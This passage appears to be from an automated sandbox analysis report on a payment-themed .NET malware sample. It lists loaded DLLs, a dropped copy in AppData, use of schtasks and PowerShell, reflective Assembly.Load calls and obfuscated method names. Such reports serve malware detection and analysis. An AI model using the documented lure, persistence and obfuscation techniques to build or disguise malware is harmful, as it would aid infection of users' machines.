            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: slc.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: sppc.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: miutils.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wmidcom.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dpapi.dll
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: msvcp60.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: winmm.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: wininet.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: mswsock.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: napinsp.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: pnrpnsp.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: wshbth.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: nlaapi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: iphlpapi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: dnsapi.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: winrnr.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: fwpuclnt.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Section loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: mscoree.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: apphelp.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: version.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: wldp.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: profapi.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: amsi.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: userenv.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: msasn1.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: gpapi.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: propsys.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: edputil.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: netutils.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: wintypes.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: appresolver.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: slc.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: sppc.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: onecoreuapcommonproxystub.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exe | Section loaded: gpapi.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: msvcp60.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: winmm.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: urlmon.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: wininet.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: iertutil.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: srvcli.dll
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Section loaded: netutils.dll
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: e-Payment.NET.CMS4006975815.exe, PhotoBoothHome.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: JXHPwNYzysUjKo.exe.0.dr, PhotoBoothHome.cs | .Net Code: InitializeComponent System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | .Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | .Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.390e848.8.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | .Net Code: TsNkxDmZai System.Reflection.Assembly.Load(byte[])
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_0040E4C4 LoadLibraryA,GetProcAddress, 13_2_0040E4C4
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe | Code function: 0_2_023C3FAF push esp; ret 0_2_023C3FB9
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A52E0 pushad ; iretd 9_2_048A52E1
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A5248 push esp; iretd 9_2_048A5249
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 9_2_048A5378 pushfd ; iretd 9_2_048A5379
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe | Code function: 13_2_0040FCF0 push eax; ret 13_2_0040FD1E
            Source: e-Payment.NET.CMS4006975815.exe | Static PE information: section name: .text entropy: 7.914356657903147
            Source: JXHPwNYzysUjKo.exe.0.dr | Static PE information: section name: .text entropy: 7.914356657903147
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, eX7sUIKLXbLBJFUXJss.cs | High entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, FoCs0V4dUW7V9Ys8RL.cs | High entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, j6u7xiPYRpOJPHghlF.cs | High entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, YHCOiHIm9y9U0KLt6C.cs | High entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, GIcmcBXmdsr9o6R5jH.cs | High entropy of concatenated method names: 'rar9R8yDPU', 'LSl9j9E0tQ', 'ToString', 'yAQ9Sp11go', 'eNs9NOZoTc', 'cuV9AWqlmf', 'gVt9lYT05n', 'oPx9WxyIRH', 'AJw9nrddHN', 'tBj9I8Rc7R'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, aJXx8DABJGbejPMByH.cs | High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'GtQ5GT9B6G', 'Pbu5QFNrfK', 'wDs5zgWekY', 'xaowLO9Il7', 'IOJwKcXv6R', 'HuXw5kpssR', 'jtPwwUYtOC', 'UdFGnL30xPZwNsgKrEN'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, LS7EsZky9IidIcyfRu.cs | High entropy of concatenated method names: 'KJZKnMdNgs', 'U5WKIh7whK', 'TYRKRpOJPH', 'VhlKjFrDBW', 'wicKERWcGI', 'L7vKOGkmTJ', 'rTVh9BxhHLC1hpgjne', 'Um4K2Xrl2MiwoUVpmk', 'SQnKKKQ0w3', 'Py2Kwpe6ao'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, vGIT7vmGkmTJonR3Jr.cs | High entropy of concatenated method names: 'FI9WagBBwr', 'AX0WNuglZI', 'f0bWl3O1qa', 'bDoWnaWcS5', 'daZWIYWV6s', 'QCelCF9Fxs', 'SpalrkUifC', 'wZUlgEyKTb', 'ry9lbmWrC3', 'NIclG4tgSQ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, bR6muntND966Zj1tHg.cs | High entropy of concatenated method names: 'NwM71lP3vJ', 'ScV7PlhL8V', 'mwx7moNQs4', 'IAk74sSG1k', 'vPM7FlVT5P', 'LK17UsQlhM', 'Feb7T5Kr89', 'HXc7HIT0Ce', 'zBt7hQGx3c', 'GsE730ao45'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, al7GZ9yc9cs62qKrsm.cs | High entropy of concatenated method names: 'HtknYldqg0', 'cgCnsNbeMp', 'MvhnxYukUN', 'C7VndIvOW8', 'iSPnZZDQV5', 'LMenVyh3dv', 'qRUnqcHeeV', 'FLin1NxT2A', 'MWSnP7Buot', 'SZWnDvjqjR'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, TM8wBMKwOiMiiMRkZ5P.cs | High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'mNhMJ0SgvM', 'O7lMBfJQPr', 'WDuMiv94X8', 'SlmMXYHrqC', 'ep8MC6TXRj', 'uPHMrAU5Jv', 'mpWMgnogDd'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, n0YQspKKCBy6FdP62Xy.cs | High entropy of concatenated method names: 'ToString', 'STPMwBdd9Y', 'qa9Mkub752', 'FTCMaYXvuD', 'mPRMSJDXLw', 'ecwMN0SU2B', 'Yd2MASNmRQ', 'yK8Mlrl9b1', 'Bhy9wBnasMBAWMnOJ5J', 'KnhCxRnGWRcYTQGrmwk'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, n549rSinEmAngKcBlV.cs | High entropy of concatenated method names: 'ToString', 'tqNO3p76rM', 'Nt4O4akmL3', 'EAUOuWNNjT', 'AvlOF5KtPL', 'wfIOUpI9Jj', 'pQ9O6e2iMp', 'LwaOTj9t4g', 'aYGOHLjW1o', 'fY8OyvE0sq'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, uYj2wPN1bAqkIUsRaQ.cs | High entropy of concatenated method names: 'Dispose', 'e0bKGLVBl0', 'AO954twDAn', 'Ltp114hTQB', 'T6ZKQRuUXR', 'FNZKzIxhMQ', 'ProcessDialogKey', 'qXg5L0Vona', 'V5h5KcTpAb', 'LQZ55Bc3Ih'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, AMdNgs1C5Wh7whKrJR.cs | High entropy of concatenated method names: 'dg4NJOuCQ1', 'KqGNBrxYZh', 'ARINi7Sym3', 'MCnNX5Ap3c', 'NoYNCYIwCq', 'UrVNrEks0L', 'J3XNgPk7Pb', 'jNgNbSHgVW', 'kANNGsj1B5', 'q5RNQcq6A5'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, Yt8bxSrDHY74lmgX1O.cs | High entropy of concatenated method names: 'tB99b8eYYq', 'zcK9QVXega', 'H5deLfuPQ6', 'tBXeKTLx8A', 'D2L93rE9KO', 'boI9828ax2', 'VKC9tm3GUB', 'qYd9Jxhk1M', 'RpI9B7JHW9', 'j1p9i4BSj3'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, KZRuUXbRDNZIxhMQ9X.cs | High entropy of concatenated method names: 'mJTeSJ2POL', 'tkEeNxk6v5', 'qkneAM3AYB', 'XtPelIvt1S', 'bLoeWa1G2e', 'BQdenx67Hj', 'jXXeIXvkgB', 'jnae0ReC7u', 'qtneRZl0EX', 'gG7ejtHKiJ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, VDBWLRDS2RfjQficRW.cs | High entropy of concatenated method names: 'IrClZMq7vq', 'QFrlqkJclV', 'js5Aux07g8', 'TncAF0H7lD', 'lulAU7ETUd', 'IAfA6Yd97I', 'HgUATwBoaC', 'do7AHsFp6H', 'JqLAybNjup', 'pDUAhPIwib'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, Rc3IhyQpIM2qjSGJZ7.cs | High entropy of concatenated method names: 'yo7oKXccF4', 'yjOowRsQ1d', 'y5uokIUbBC', 'PI2oSfG6kC', 'ox0oNn16M2', 'kp8ol3AbQA', 't2JoWu4ew2', 'XrQegNSm2C', 'JuiebOVjvC', 'oK9eGISbBa'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, mAs9Z5JbfVQvPBhYBI.cs | High entropy of concatenated method names: 'XcpEhwinI1', 'BioE8Z75or', 'DumEJUT61M', 'arFEBYPBcK', 'XbvE4ZscCI', 'OJkEuTmLYj', 'lqbEFXlAwJ', 'mFnEUl3fcE', 'hgTE6Kkl7C', 'w1PETD0vI8'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, W0VonaGr5hcTpAbTQZ.cs | High entropy of concatenated method names: 'pwKemh4eIq', 'ahve4VNEtD', 'OrveuEfGkl', 'BU0eFnyP2O', 'dbweJVjkDd', 'p6feUiRmvq', 'Next', 'Next', 'Next', 'NextBytes'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, atuRJ3TU8htJN5Xrv0.cs | High entropy of concatenated method names: 'S0vnSxPYmc', 'cG9nAMC28O', 'hI1nW2KiW1', 'eYDWQP9OLW', 'oSRWzvOKUk', 'NldnLdIPAn', 'QcknKB4BIC', 'fNAn5QvNq3', 'y7enwNHdyO', 'CUOnkWAksS'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.5770000.12.raw.unpack, gH50Mg5ADNSMKJgZZY.cs | High entropy of concatenated method names: 'IO8xmc5rP', 'yhldqwoKE', 'apQVkaRG2', 'nf0qMdgeO', 'vJFPABrDA', 'rH6DluZsg', 'KgcvgcYoHP0Jd4gs65', 'SdBNZ0orG6ScaBqob7', 'dxre5Z5Qb', 'oOyMjIM5f'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, eX7sUIKLXbLBJFUXJss.csHigh entropy of concatenated method names: 'woGoYhHK1o', 'xtJosFQbfX', 'fUNoxlMKKO', 'bNmodohltZ', 'ADCoZLb1bE', 'nZBoVAOPPd', 'SR6oqoKxC4', 'dg0o1D60ZE', 'lXvoPSko2K', 'AEPoDwH9yV'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, FoCs0V4dUW7V9Ys8RL.csHigh entropy of concatenated method names: 'EU7KbyI9fmOqp1QSTU0', 'FqUuypIUQtji1NQJx7g', 'zxHWed1vib', 'EGGWoVt38U', 'G8cWMOZjhr', 'zCih6WIyfi1yoX40fke', 'Ndd86NImLqRtr3wfD2N'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, j6u7xiPYRpOJPHghlF.csHigh entropy of concatenated method names: 'UJEAdt1fko', 'd97AVgVlHu', 'NcuA1UAr7m', 'Tu3AP42ys1', 'qW3AEG10BF', 'JG5AOZP9g7', 'ry7A9fCiHa', 'sJYAea4coq', 'IM7Ao1R0PF', 'NRgAMuPOqZ'
            Source: 0.2.e-Payment.NET.CMS4006975815.exe.3967868.7.raw.unpack, YHCOiHIm9y9U0KLt6C.csHigh entropy of concatenated method names: 'wZmwaJ0lMI', 'lOZwSBnVIT', 's8swNce0dM', 'aq0wATSknj', 'k5ywl5BoHo', 'aaMwWNmETw', 'KxnwnosyNW', 'JGLwI2ERu4', 'Tc0w0XfKsR', 'uNZwRTqrmV'
